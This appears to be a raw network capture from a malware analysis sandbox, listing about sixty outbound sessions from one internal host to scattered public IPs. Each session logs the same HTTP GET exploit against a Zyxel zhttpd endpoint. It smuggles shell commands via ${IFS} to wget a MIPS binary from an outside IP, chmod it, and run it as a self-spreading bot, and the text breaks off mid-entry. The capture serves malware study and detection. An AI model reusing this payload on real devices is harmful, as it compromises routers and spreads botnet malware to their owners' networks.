                                                        813192.168.2.1443510132.26.157.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119821072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        814192.168.2.1457412117.84.241.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119899988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        815192.168.2.1456838206.45.70.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119916916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        816192.168.2.1458848107.189.141.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119935989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        817192.168.2.1435262150.49.38.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.119954109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        818192.168.2.145272427.126.185.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120003939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        819192.168.2.1433446114.215.164.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120049953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        820192.168.2.1457732168.2.185.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120088100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        821192.168.2.1438824193.70.16.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120126963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        822192.168.2.143688276.48.37.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120167017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        823192.168.2.1436690200.252.232.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120199919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        824192.168.2.144306868.161.131.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120234013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        825192.168.2.143928419.92.232.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120270967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        826192.168.2.145468627.181.75.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120316982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        827192.168.2.1456600202.77.214.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120338917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        828192.168.2.144230641.100.197.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120390892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        829192.168.2.143975246.206.19.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120436907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        830192.168.2.143481088.219.103.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120456934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        831192.168.2.1438842125.183.53.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120491982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        832192.168.2.14368645.170.25.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120537043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        833192.168.2.146073673.171.15.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120572090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        834192.168.2.1441416128.138.230.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120609045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        835192.168.2.143340464.16.147.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120640993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        836192.168.2.145176088.207.214.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120678902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        837192.168.2.1437698191.35.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120714903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        838192.168.2.1451508108.175.14.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120759010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        839192.168.2.145691476.13.204.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120791912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        840192.168.2.1438158103.249.91.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120822906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        841192.168.2.1446922109.150.138.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120871067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        842192.168.2.144180463.252.178.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120912075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        843192.168.2.1438184162.5.58.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.120934010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        844192.168.2.1453698121.178.75.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121007919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        845192.168.2.144278062.243.21.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121047974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        846192.168.2.1438284206.232.30.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121078014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        847192.168.2.1433464176.118.130.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121103048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        848192.168.2.1448080137.217.156.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121155024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        849192.168.2.145368853.52.76.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121190071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        850192.168.2.14386444.157.9.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121231079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        851192.168.2.1438700201.252.110.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121279955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        852192.168.2.1456494158.229.41.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121314049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        853192.168.2.145170684.115.103.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121364117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        854192.168.2.145617817.243.212.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121397018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        855192.168.2.1450834197.159.207.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121412992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        856192.168.2.1454584197.40.146.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121470928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        857192.168.2.146051872.230.148.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121501923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        858192.168.2.1459578211.59.85.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121526003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        859192.168.2.1442844148.230.102.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121583939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        860192.168.2.1444594125.215.220.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121613979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        861192.168.2.1460710136.176.142.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121643066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        862192.168.2.1448910218.40.15.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121692896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        863192.168.2.145842875.142.196.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121732950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        864192.168.2.1459938205.64.136.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121754885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        865192.168.2.144680689.181.60.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121793032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        866192.168.2.1449606101.140.240.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121833086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        867192.168.2.1449942206.106.83.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121877909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        868192.168.2.1435434122.143.112.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121929884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        869192.168.2.145493268.238.218.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121946096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        870192.168.2.1436140156.104.126.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.121995926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        871192.168.2.144536642.172.239.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122047901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        872192.168.2.1437216217.11.120.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122078896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        873192.168.2.145372882.219.55.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122123957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        874192.168.2.144849470.145.72.166443
                                                        TimestampBytes transferredDirectionData
